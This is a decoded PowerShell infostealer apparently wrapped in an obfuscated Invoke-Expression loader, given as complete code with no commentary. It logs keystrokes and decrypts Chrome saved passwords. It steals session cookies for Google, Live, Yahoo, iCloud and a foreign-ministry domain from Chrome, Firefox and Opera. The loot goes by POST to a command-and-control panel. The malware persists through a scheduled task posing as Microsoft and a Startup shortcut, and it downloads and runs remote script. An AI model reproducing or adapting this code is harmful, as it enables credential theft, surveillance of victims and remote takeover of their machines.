Decoded

1. Invoke-ExPrESsiON ( "\" ( New-ObJECt systeM.iO.compresSIon.dEfLATestREAm([Io.mEMorYsTReAM][CoNVert]::FrOMbasE64StriNg('Add-Type -AssemblyName System.Security
2. ##################
3. $global:panel_url = "http://f6lvapzvn1.linkpc.net/"
4.  
5. ##################
6. $global:SystemDataSQLite = "http://www.9ory.com/uploads/1543938654841.jpeg"
7. $global:x64SQLiteInterop = "http://www.9ory.com/uploads/1543938654852.jpeg"
8. $global:x86SQLiteInterop = "http://www.9ory.com/uploads/1543938654863.jpeg"
9. ##################
10. $global:bool = @{
11. $true = 'true'
12. $false = 'false'
13. }
14. $global:isprocess64 = @{
15. $true = 'x64'
16. $false = 'x32'
17. }
18. $global:iswin64 = @{
19. $true = 'Win64'
20. $false= 'Win32'
21.  
22. }
23.  
24. $global:crlf = "`r`n"
25. $global:commandline = (gwmi Win32_Process -Filter ("processid=" + $PID)).CommandLine
26.  
27. $global:name = 'eSRfqHDaxC'
28. $global:install = '%tmp%'
29.  
30. $global:scriptblock_logger = {
31.  
32. param($Path)
33.  
34. if (-not $Path) {exit}
35.  
36. $signatures = @'
37. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
38. public static extern short GetAsyncKeyState(int virtualKeyCode);
39. [DllImport("user32.dll", CharSet=CharSet.Auto)]
40. public static extern int GetKeyboardState(byte[] keystate);
41. [DllImport("user32.dll", CharSet=CharSet.Auto)]
42. public static extern int MapVirtualKey(uint uCode, int uMapType);
43. [DllImport("user32.dll", CharSet=CharSet.Auto)]
44. public static extern int ToUnicodeEx(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags, IntPtr dwhkl);
45. [DllImport("user32.dll", CharSet=CharSet.Auto)]
46. public static extern IntPtr GetKeyboardLayout(int idThread);
47. [DllImport("user32.dll", CharSet=CharSet.Auto)]
48. public static extern IntPtr GetForegroundWindow();
49. [DllImport("user32.dll", CharSet=CharSet.Auto , SetLastError=true)]
50. public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out int lpdwProcessId);
51. [DllImport("user32.dll",CharSet=CharSet.Auto, SetLastError=true)]
52. public static extern int GetWindowText(IntPtr hWnd, System.Text.StringBuilder lpString,int nMaxCount);
53. [DllImport("user32.dll", CharSet=CharSet.Auto , SetLastError = true)]
54. public static extern int GetWindowTextLength(IntPtr hwnd);
55. '@
56.  
57. if($Script:API -eq $null){
58. $Script:API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
59. }
60.  
61. try
62. {
63. while ($true)
64. {
65. Start-Sleep -Milliseconds 40
66.  
67. for ($ascii = 9; $ascii -le 254; $ascii++)
68. {
69. $state = $Script:API::GetAsyncKeyState($ascii)
70. if ($state -eq -32767)
71. {
72. $null = [console]::CapsLock
73. $virtualKey = $API::MapVirtualKey($ascii, 3)
74.  
75. $kbstate = New-Object Byte[] 256
76. $checkkbstate = $API::GetKeyboardState($kbstate)
77.  
78. $mychar = New-Object -TypeName System.Text.StringBuilder
79.  
80. $myHwnd = $Script:API::GetForegroundWindow()
81. $length = $Script:API::GetWindowTextLength($myHwnd)
82. $sb = New-Object -TypeName System.Text.StringBuilder ($length + 1)
83.  
84.  
85. $Script:API::GetWindowText($myHwnd, $sb, $sb.Capacity) | Out-Null;
86. $sb = $sb.ToString()
87.  
88.  
89. $myPid = [IntPtr]::Zero
90.  
91. $myTid = $Script:API::GetWindowThreadProcessId($myHWND,[ref] $myPid)
92. $dwhkl = $Script:API::GetKeyboardLayout($myTid)
93. $success = $Script:API::ToUnicodeEx($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0,$dwhkl)
94.  
95. if ($success)
96. {
97. if ($mychar.ToString()-eq "`r") {
98. [System.IO.File]::AppendAllText($Path,"`r`n", [System.Text.Encoding]::Unicode)
99. } else {
100. if ($sb -eq $old_sb) {
101. [System.IO.File]::AppendAllText($Path,$mychar, [System.Text.Encoding]::Unicode)
102. } else {
103. [System.IO.File]::AppendAllText($Path, "`r`n" + '[' + $sb + '] [' + [System.DateTime]::Now.ToString() + ']' + "`r`n" + $mychar, [System.Text.Encoding]::Unicode)
104. $old_sb = $sb
105. }
106. }
107.  
108. }
109. }
110. }
111. }
112. }
113. finally {}
114. }
115.  
116. function Set-Key {
117. param([string]$string)
118. $length = $string.length
119. $pad = 32-$length
120. if (($length -lt 16) -or ($length -gt 32)) {Throw "String must be between 16 and 32 characters"}
121. $encoding = New-Object System.Text.ASCIIEncoding
122. $bytes = $encoding.GetBytes($string + "0" * $pad)
123. return $bytes
124. }
125.  
126.  
127. $secret = Set-Key "never find this key"
128.  
129. function Set-EncryptedData {
130. param($key,[string]$plainText)
131. $securestring = new-object System.Security.SecureString
132. $chars = $plainText.toCharArray()
133. foreach ($char in $chars) {$secureString.AppendChar($char)}
134. $encryptedData = ConvertFrom-SecureString -SecureString $secureString -Key $key
135. return $encryptedData
136. }
137.  
138. function Uid {
139.  
140. $hwid = (Get-WMIObject -Class Win32_BIOS).SerialNumber + '_' + $env:UserName + '_' + $env:ComputerName
141. return $hwid;
142. }
143.  
144. function CookiesTo-MYJson ([System.Collections.ArrayList] $ArrayList)
145. {
146.  
147.  
148. $i = 0
149. $ArrayJson = '[' + $global:crlf
150. Foreach ($Array in $ArrayList) {
151. $i++
152. $ArrayJson += '{' + $global:crlf
153.  
154. $ArrayJson += '"domain": "' + $Array.domain +'",' + $global:crlf
155. $ArrayJson += '"expirationDate": ' + $Array.expirationDate +',' + $global:crlf
156. $ArrayJson += '"hostOnly": ' + $global:bool[$Array.hostOnly -eq $true]+',' + $global:crlf
157. $ArrayJson += '"httpOnly": ' + $global:bool[$Array.httpOnly -eq $true]+',' + $global:crlf
158. $ArrayJson += '"name": "' + $Array.name +'",' + $global:crlf
159. $ArrayJson += '"path": "' + $Array.path +'",' + $global:crlf
160. $ArrayJson += '"sameSite": "' + $Array.sameSite +'",' + $global:crlf
161. $ArrayJson += '"secure": ' + $global:bool[$Array.secure -eq $true]+',' + $global:crlf
162. $ArrayJson += '"session": ' +$global:bool[ $Array.session -eq $true]+',' + $global:crlf
163. $ArrayJson += '"storeId": "' + $Array.storeId +'",' + $global:crlf
164. $ArrayJson += '"value": "' + $Array.value +'",' + $global:crlf
165. $ArrayJson += '"id": ' + $Array.id +'' + $global:crlf
166.  
167. $ArrayJson += '}'
168.  
169. if ($i -lt $ArrayList.Count) {
170. $ArrayJson += ','
171. }
172. $ArrayJson += $global:crlf
173.  
174. }
175. $ArrayJson += ']'
176. return $ArrayJson
177.  
178.  
179. }
180.  
181. function PasswordsTo-MYJson ([System.Collections.ArrayList] $ArrayList)
182. {
183.  
184.  
185. $i = 0
186. $ArrayJson = '[' + $global:crlf
187. Foreach ($Array in $ArrayList) {
188. $i++
189. $ArrayJson += '{' + $global:crlf
190.  
191. $ArrayJson += '"website": "' + $Array.website +'",' + $global:crlf
192. $ArrayJson += '"username": "' + $Array.username +'",' + $global:crlf
193. $ArrayJson += '"password": "' + $Array.password +'",' + $global:crlf
194. $ArrayJson += '"id": ' + $Array.id +'' + $global:crlf
195.  
196. $ArrayJson += '}'
197.  
198. if ($i -lt $ArrayList.Count) {
199. $ArrayJson += ','
200. }
201. $ArrayJson += $global:crlf
202.  
203. }
204. $ArrayJson += ']'
205. return $ArrayJson
206.  
207.  
208. }
209.  
210.  
211. ### PUBLIC FUNCTION #######
212.  
213. function unProtecte ($data)
214. {
215. $decrypt_val = [System.Security.Cryptography.ProtectedData]::Unprotect($data, $null, [Security.Cryptography.DataProtectionScope]::Localmachine)
216. $data_val = [System.Text.Encoding]::Default.GetString($decrypt_val)
217. Return $data_val
218. }
219. function ChromeDB
220. {
221. Return "$($env:LOCALAPPDATA)\Google\Chrome\User Data\Default"
222. }
223.  
224. function FirefoxDB
225. {
226. $profilePath = "$($env:APPDATA)\Mozilla\Firefox\Profiles\*.default"
227. $defaultProfile = $(Get-ChildItem $profilePath).FullName
228. Return $defaultProfile
229.  
230. }
231.  
232. function OperaDB
233. {
234. Return "$($env:APPDATA)\Opera Software\Opera Stable"
235. }
236.  
237.  
238. function Add-SQLite {
239.  
240. switch ( [intptr]::Size ) {
241. 4 { $binarch = 'x86' }
242. 8 { $binarch = 'x64' }
243. }
244. try {
245. $SQLiteCLASS = New-Object -TypeName System.Data.SQLite.SQLiteConnection
246. } catch {
247.  
248. }
249.  
250. if ($SQLiteCLASS -eq $null) {
251. if (![System.IO.File]::Exists("$env:tmp\lib_$binarch\SQLite.Interop.dll") -or ![System.IO.File]::Exists("$env:tmp\lib_$binarch\System.Data.SQLite.dll"))
252. {
253.  
254. $SQLiteWEB = new-object System.Net.WebClient
255. try {
256. New-Item -ItemType Directory -Force -Path "$env:tmp\lib_$binarch\"
257. Switch ($binarch) {
258. 'x86' {
259. $SQLiteWEB.DownloadFile($global:x86SQLiteInterop,"$env:tmp\lib_$binarch\SQLite.Interop.dll")
260. $SQLiteWEB.DownloadFile($global:SystemDataSQLite,"$env:tmp\lib_$binarch\System.Data.SQLite.dll")
261. }
262.  
263. 'x64' {
264. $SQLiteWEB.DownloadFile($global:x64SQLiteInterop,"$env:tmp\lib_$binarch\SQLite.Interop.dll")
265. $SQLiteWEB.DownloadFile($global:SystemDataSQLite,"$env:tmp\lib_$binarch\System.Data.SQLite.dll")
266. }
267. }
268.  
269.  
270. } finally {
271. $SQLiteWEB.Dispose()
272. }
273. }
274. if ([System.IO.File]::Exists("$env:tmp\lib_$binarch\SQLite.Interop.dll") -and [System.IO.File]::Exists("$env:tmp\lib_$binarch\System.Data.SQLite.dll"))
275. {
276. Add-Type -Path "$env:tmp\lib_$binarch\System.Data.SQLite.dll"
277. return $true
278. } else {
279. return $false
280.  
281. }
282. } else {
283. $SQLiteCLASS.Close()
284. return $true
285.  
286. }
287.  
288.  
289. }
290.  
291. function urlPOST($link,$data)
292. {
293. try {
294. $webrequest = [System.Net.WebRequest]::Create($link)
295. $encodeddata = Set-EncryptedData -key $secret -plainText $data
296. $uid = Uid
297. $encodedcontent = [System.Text.Encoding]::UTF8.GetBytes("uid=$uid&data=$encodeddata")
298. $webrequest.Method = 'POST'
299. $webrequest.ContentType = "application/x-www-form-urlencoded"
300.  
301. $webrequest.UserAgent = $("Mozilla/5.0 ({0}; {1}; {2}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36" -f [Environment]::OSVersion.ToString().Replace("Microsoft Windows ", "Win"),
302. $global:iswin64[[Environment]::Is64BitOperatingSystem -eq $true],
303. $global:isprocess64[[Environment]::Is64BitProcess -eq $true])
304.  
305. if($encodedcontent.length -gt 0) {
306. $webrequest.ContentLength = $encodedcontent.length
307. $requestStream = $webrequest.GetRequestStream()
308. $requestStream.Write($encodedcontent, 0, $encodedcontent.length)
309. $requestStream.Flush()
310. $requestStream.Close()
311. }
312.  
313. [System.Net.WebResponse] $resp = $webrequest.GetResponse();
314. if($resp -ne $null)
315. {
316.  
317. return $true
318. }
319. else
320. {
321. return $false
322. }
323. }catch {
324. return $false
325. }
326.  
327. }
328. ###########################
329.  
330.  
331.  
332. function OperaSESSION ($SQLiteDB,$search,$condition) {
333.  
334. try {
335.  
336. if(![System.IO.File]::Exists($SQLiteDB)) {
337. return $null
338. }
339. $cookies_array = New-Object System.Collections.Generic.List[System.Object]
340. $conn = New-Object -TypeName System.Data.SQLite.SQLiteConnection
341. $command = $conn.CreateCommand()
342. try {
343.  
344. $conn.ConnectionString = "Data Source=$SQLiteDB"
345. $conn.Open()
346.  
347. $command.CommandText = "SELECT COUNT(*) AS Count FROM 'cookies' WHERE host_key LIKE $search AND name LIKE $condition"
348. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
349. $dataset = New-Object System.Data.DataSet
350. [void]$adapter.Fill($dataset)
351.  
352. if ($dataset.Tables.Count -eq 0 -or $dataset.Tables[0].rows[0].Count -eq 0) {
353. return $null
354. }
355.  
356. $command.CommandText = "SELECT * FROM 'cookies' WHERE host_key LIKE $search"
357. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
358. $dataset = New-Object System.Data.DataSet
359. [void]$adapter.Fill($dataset)
360.  
361. if ($dataset.Tables.Count -eq 0) {
362. return $null
363. }
364.  
365.  
366. $i = 0
367.  
368. foreach ($row in $dataset.Tables[0])
369. {
370. $i++
371. $cookies = @{}
372. $cookies.domain = $row.host_key
373. $cookies.expirationDate = $row.expires_utc
374. $cookies.hostOnly = $false
375. $cookies.httpOnly = ($row.httponly -eq 1)
376. $cookies.name = $row.name
377. $cookies.path = $row.path
378. $cookies.sameSite = 'no_restriction'
379. $cookies.secure = ($row.secure -eq 1)
380. $cookies.session = ($row.has_expires -eq 0)
381. $cookies.storeId = '0'
382. try {
383. $value = unProtecte($row.encrypted_value)
384. }catch {
385. $value = ''
386. }
387. $cookies.value = $value
388. $cookies.id = $i
389. $cookies_array.Add($cookies)
390. }
391.  
392.  
393. }
394. finally {
395. $command.Dispose()
396. $conn.Close()
397. }
398. if ($cookies_array.Count -gt 0) {
399.  
400. return CookiesTo-MYJson $cookies_array
401. } else {
402. return $null
403. }
404. } catch {
405. return $null
406. }
407.  
408. }
409.  
410. function FirefoxSESSION ($SQLiteDB,$search,$condition) {
411.  
412. try {
413.  
414. if(![System.IO.File]::Exists($SQLiteDB)) {
415. return $null
416. }
417. $cookies_array = New-Object System.Collections.Generic.List[System.Object]
418. $conn = New-Object -TypeName System.Data.SQLite.SQLiteConnection
419. $command = $conn.CreateCommand()
420. try {
421.  
422. $conn.ConnectionString = "Data Source=$SQLiteDB"
423. $conn.Open()
424.  
425. $command.CommandText = "SELECT COUNT(*) AS Count FROM 'moz_cookies' WHERE host LIKE $search AND name LIKE $condition"
426. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
427. $dataset = New-Object System.Data.DataSet
428. [void]$adapter.Fill($dataset)
429.  
430. if ($dataset.Tables.Count -eq 0 -or $dataset.Tables[0].rows[0].Count -eq 0) {
431. return $null
432. }
433.  
434. $command.CommandText = "SELECT * FROM 'moz_cookies' WHERE host LIKE $search"
435. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
436. $dataset = New-Object System.Data.DataSet
437. [void]$adapter.Fill($dataset)
438.  
439. if ($dataset.Tables.Count -eq 0) {
440. return $null
441. }
442.  
443.  
444. $i = 0
445.  
446. foreach ($row in $dataset.Tables[0])
447. {
448. $i++
449. $cookies = @{}
450. $cookies.domain = $row.host
451. $cookies.expirationDate = $row.expiry
452. $cookies.hostOnly = $false
453. $cookies.httpOnly = ($row.isHttpOnly -eq 1)
454. $cookies.name = $row.name
455. $cookies.path = $row.path
456. $cookies.sameSite = 'no_restriction'
457. $cookies.secure = ($row.IsSecure -eq 1)
458. $cookies.session = $false
459. $cookies.storeId = '0'
460. $cookies.value = $row.value
461. $cookies.id = $i
462. $cookies_array.Add($cookies)
463. }
464.  
465.  
466. }
467. finally {
468. $command.Dispose()
469. $conn.Close()
470. }
471. if ($cookies_array.Count -gt 0) {
472.  
473. return CookiesTo-MYJson $cookies_array
474. } else {
475. return $null
476. }
477. } catch {
478. return $null
479. }
480. }
481.  
482.  
483. function ChromeSESSION ($SQLiteDB,$search,$condition) {
484.  
485. try {
486.  
487. if(![System.IO.File]::Exists($SQLiteDB)) {
488. return $null
489. }
490. $cookies_array = New-Object System.Collections.Generic.List[System.Object]
491. $conn = New-Object -TypeName System.Data.SQLite.SQLiteConnection
492. $command = $conn.CreateCommand()
493. try {
494.  
495. $conn.ConnectionString = "Data Source=$SQLiteDB"
496. $conn.Open()
497.  
498. $command.CommandText = "SELECT COUNT(*) AS Count FROM 'cookies' WHERE host_key LIKE $search AND name LIKE $condition"
499. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
500. $dataset = New-Object System.Data.DataSet
501. [void]$adapter.Fill($dataset)
502.  
503. if ($dataset.Tables.Count -eq 0 -or $dataset.Tables[0].rows[0].Count -eq 0) {
504. return $null
505. }
506.  
507.  
508. $command.CommandText = "SELECT * FROM 'cookies' WHERE host_key LIKE $search"
509. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
510. $dataset = New-Object System.Data.DataSet
511. [void]$adapter.Fill($dataset)
512.  
513. if ($dataset.Tables.Count -eq 0) {
514. return $null
515. }
516.  
517.  
518. $i = 0
519.  
520. foreach ($row in $dataset.Tables[0])
521. {
522. $i++
523. $cookies = @{}
524. $cookies.domain = $row.host_key
525. $cookies.expirationDate = $row.expires_utc
526. $cookies.hostOnly = $false
527. $cookies.httpOnly = ($row.httponly -eq 1)
528. $cookies.name = $row.name
529. $cookies.path = $row.path
530. $cookies.sameSite = 'no_restriction'
531. $cookies.secure = ($row.secure -eq 1)
532. $cookies.session = ($row.has_expires -eq 0)
533. $cookies.storeId = '0'
534. try {
535. $value = unProtecte($row.encrypted_value)
536. }catch {
537. $value = ''
538. }
539. $cookies.value = $value
540. $cookies.id = $i
541. $cookies_array.Add($cookies)
542. }
543.  
544.  
545. }
546. finally {
547. $command.Dispose()
548. $conn.Close()
549. }
550. if ($cookies_array.Count -gt 0) {
551.  
552. return CookiesTo-MYJson $cookies_array
553. } else {
554. return $null
555. }
556. } catch {
557. return $null
558. }
559. }
560.  
561.  
562. function ChromePASS ($SQLiteDB) {
563.  
564. try {
565.  
566. if(![System.IO.File]::Exists($SQLiteDB)) {
567. return $null
568. } else {
569.  
570. $TimeStamp = get-date -f yyyyMMddhhmm
571. $SQLiteDB_Destination = "$env:temp\" + $TimeStamp
572. Copy-Item -Path $SQLiteDB -Destination $SQLiteDB_Destination -Force
573.  
574. }
575. $passwords_array = New-Object System.Collections.Generic.List[System.Object]
576. $conn = New-Object -TypeName System.Data.SQLite.SQLiteConnection
577. $command = $conn.CreateCommand()
578. try {
579.  
580. $conn.ConnectionString = "Data Source=$SQLiteDB_Destination"
581. $conn.Open()
582.  
583. $command.CommandText = "SELECT COUNT(*) AS Count FROM 'logins'"
584. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
585. $dataset = New-Object System.Data.DataSet
586. [void]$adapter.Fill($dataset)
587.  
588. if ($dataset.Tables.Count -eq 0 -or $dataset.Tables[0].rows[0].Count -eq 0) {
589. return $null
590. }
591.  
592.  
593. $command.CommandText = "SELECT origin_url, username_value ,password_value FROM 'logins'"
594. $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
595. $dataset = New-Object System.Data.DataSet
596. [void]$adapter.Fill($dataset)
597.  
598. if ($dataset.Tables.Count -eq 0) {
599. return $null
600. }
601.  
602.  
603. $i = 0
604.  
605. foreach ($row in $dataset.Tables[0])
606. {
607. $i++
608. $passwords = @{}
609. $passwords.website = $row.origin_url
610. $passwords.username = $row.username_value
611.  
612. try {
613. $value = unProtecte($row.password_value)
614. }catch {
615. $value = ''
616. }
617.  
618. $passwords.password = $value
619. $passwords.id = $i
620. $passwords_array.Add($passwords)
621. }
622.  
623.  
624. }
625. finally {
626. $command.Dispose()
627. $conn.Close()
628. Remove-Item $SQLiteDB_Destination
629. }
630. if ($passwords_array.Count -gt 0) {
631.  
632. return PasswordsTo-MYJson $passwords_array
633. } else {
634. return $null
635. }
636. } catch {
637. return $null
638. }
639. }
640.  
641. function BrowsersLOGINS {
642. try {
643. $ChromeDB = ChromeDB
644. $ChromePASS = ''
645. $ChromePASS = ChromePASS "$ChromeDB\Login Data"
646. if ($ChromePASS) {
647. # $ChromeSESSION | Set-Content "$env:temp\c_logins.text"
648.  
649. while ((urlPOST "$global:panel_url/api/chrome/submit" $ChromePASS) -eq $false) {
650. Start-Sleep -s 60
651. }
652.  
653. }
654. } catch {}
655.  
656.  
657. }
658.  
659. function Shortcut ($sourceCMD,$destinationPATH,$isPARAM = $false)
660. {
661. ### BEGIN Shortcut
662.  
663. $wshshell = New-Object -comObject WScript.Shell
664. $shortcut = $wshshell.CreateShortcut($destinationPATH)
665. try {
666. $actionparams = $sourceCMD.Split(' ',2)
667. if ($isPARAM -And $actionparams -is [array]) {
668. $shortcut.TargetPath = $actionparams[0]
669. if ($actionparams.Length -eq 2) {
670. $shortcut.Arguments = $actionparams[1]
671. }
672.  
673. } else {
674. $shortcut.TargetPath = $sourceCMD
675. }
676.  
677. $shortcut.IconLocation = "%SystemRoot%\System32\shell32.dll, 3"
678. $shortcut.WindowStyle = "7"
679. $shortcut.Save()
680. } catch {
681.  
682. }
683.  
684. }
685.  
686. function Taskscheduler ($sourceCMD,$isPARAM = $false) {
687. ### BEGIN Taskscheduler
688. try {
689. $service = New-Object -ComObject Schedule.service
690.  
691. $service.Connect()
692.  
693. $task = $service.NewTask($null)
694.  
695. $task.RegistrationInfo.Author = "Microsoft Corporation"
696. $task.RegistrationInfo.Description = ""
697.  
698. $task.Settings.Enabled = $true
699. $task.Settings.AllowDemandStart = $true
700.  
701. $task.Principal.RunLevel = 0
702.  
703. $trigger = $task.Triggers.Create(2)
704. $trigger.StartBoundary = [datetime]::Now.AddMinutes(5).ToString("yyyy-MM-dd'T'HH:mm:ss")
705. $trigger.DaysInterval = 1
706. $trigger.Enabled = $true
707. $trigger.Repetition.StopAtDurationEnd = $false
708. $trigger.Repetition.Interval = "PT59M"
709.  
710.  
711. $action = $task.Actions.Create($null)
712.  
713. $actionparams = $sourceCMD.Split(' ',2)
714. if ($isPARAM -And $actionparams -is [array]) {
715. $action.Path = $actionparams[0]
716. if ($actionparams.Length -eq 2) {
717. $action.Arguments = $actionparams[1]
718. }
719. } else {
720. $action.Path = $sourceCMD
721. }
722. $service.GetFolder("\").RegisterTaskDefinition($name,$task, 6,$null,$null, 0, $null) | Out-Null
723. } catch {}
724. }
725.  
726.  
727.  
728. function Startup {
729.  
730. $env_var = $global:commandline
731.  
732. $i = 0
733. $param = ""
734.  
735. while ($env_var.Length -gt 0) {
736. if ($env_var.Length -gt 1024) {
737. $env_element = $env_var.Substring(0,1024)
738. } else {
739. $env_element = $env_var.Substring(0,$env_var.Length)
740. }
741.  
742. [Environment]::SetEnvironmentVariable($global:name + '_' + $i,$env_element , 'User')
743. $param = $param + "%" + $global:name + '_' + $i + "%"
744. $i++
745. if ($env_var.Length -gt 1024) {
746. $env_var = $env_var.Remove(0,1024)
747. } else {
748. $env_var = $env_var.Remove(0,$env_var.Length)
749. }
750. }
751. Taskscheduler ('Cmd.exe /c START "" /min ' + $param) $True
752. $startup_folder = [System.Environment]::ExpandEnvironmentVariables("%appdata%") + "\Microsoft\Windows\Start Menu\Programs\Startup\"
753. Shortcut ('Cmd.exe /c START "" /min ' + $param) ($startup_folder + "\" + $global:name + '.lnk') $True
754.  
755. }
756.  
757. function BrowsersPS () {
758.  
759. $client = New-Object System.Net.WebClient
760. try {
761. $data = $client.DownloadString("$global:panel_url/api/pscript")
762. if ($data -ne '') {
763. $scriptBlock = ([scriptblock]::Create($data))
764. Start-Job -ScriptBlock $scriptBlock
765. # Invoke-Command -ScriptBlock $scriptBlock
766. }
767. } catch {}
768.  
769. }
770.  
771. function BrowsersLOGGER () {
772.  
773. $install_dir = [System.Environment]::ExpandEnvironmentVariables($global:install)
774. if (!(Test-Path $install_dir)) {
775. $install_dir = $env:TEMP
776. }
777.  
778.  
779. try {
780. $data = [System.IO.File]::ReadAllText($install_dir + '\' + $global:name + '.log')
781. if ($data -ne $null) {
782. while ((urlPOST "$global:panel_url/api/logger/submit" $data) -eq $false) {
783. Start-Sleep -s 60
784. }
785. Remove-Item ($install_dir + '\' + $global:name + '.log')
786. }
787.  
788. } catch {}
789.  
790. }
791.  
792. function InitLOGGER() {
793.  
794. $install_dir = [System.Environment]::ExpandEnvironmentVariables($global:install)
795. if (!(Test-Path $install_dir)) {
796. $install_dir = $env:TEMP
797. }
798. Start-Job -ScriptBlock $global:scriptblock_logger -ArgumentList ($install_dir + '\' + $global:name + '.log') | Out-Null
799. }
800.  
801.  
802. function BrowsersCOOKIES ($website,$cname) {
803.  
804. $ChromeDB = ChromeDB
805. $ChromeSESSION = ''
806. $ChromeSESSION = ChromeSESSION "$chromeDB\Cookies" $website $cname
807. if ($ChromeSESSION) {
808. while ((urlPOST "$global:panel_url/api/chrome/submit" $ChromeSESSION) -eq $false) {
809. Start-Sleep -s 60
810. }
811.  
812. }
813.  
814. $firefoxDB = firefoxDB
815. foreach ($DB in $firefoxDB) {
816. $FirefoxSESSION = ''
817. $FirefoxSESSION = FirefoxSESSION "$DB\cookies.sqlite" $website $cname
818. if ($FirefoxSESSION) {
819. while ((urlPOST "$global:panel_url/api/firefox/submit" $FirefoxSESSION) -eq $false) {
820. Start-Sleep -s 60
821. }
822. }
823.  
824. }
825.  
826. $OperaDB = OperaDB
827. $OperaSESSION = ''
828. $OperaSESSION = OperaSESSION "$OperaDB\Cookies" $website $cname
829. if ($OperaSESSION) {
830. while ((urlPOST "$global:panel_url/api/opera/submit" $OperaSESSION) -eq $false) {
831. Start-Sleep -s 60
832. }
833.  
834.  
835. }
836. }
837.  
838.  
839. $outMutex = ""
840. $Mutex = New-Object -TypeName system.threading.mutex($true, "Global\$global:name", [ref] $outMutex)
841. if (!$outMutex) {exit}
842.  
843. while ((Add-SQLite) -eq $false) {
844. Start-Sleep -s 60
845. }
846.  
847.  
848. InitLOGGER
849. while ($true) {
850.  
851.  
852. BrowsersLOGINS
853.  
854. BrowsersCOOKIES "'%.google.%'" "'SSID'"
855.  
856. BrowsersCOOKIES "'%.live.%'" "'MSPAuth'"
857.  
858. BrowsersCOOKIES "'%.yahoo.%'" "'T'"
859.  
860. BrowsersCOOKIES "'%.mofa.gov.%'" "'cadataKey'"
861.  
862. BrowsersCOOKIES "'%.icloud.%'" "'X-APPLE-WEBAUTH-TOKEN'"
863.  
864. BrowsersLOGGER
865.  
866. Startup
867. BrowsersPS
868.  
869. Start-Sleep -s 900
870.  
871. }' )"\" + [STRing][ChAr]44 + "\" [SYsteM.io.compresSion.COMpressIOnmODE]::dEComPrEss ) | FOReACh-OBjEcT {New-ObJECt iO.STREAMrEAdeR( `$_"\" + [STRing][ChAr]44 + "\" [SYstEm.TEXt.EncodiNG]::AScii ) }| FoREacH-objeCt{`$_.rEADtOENd( ) } ) | . ( `$PshOmE[21]+`$pSHOmE[34]+'x')"\" )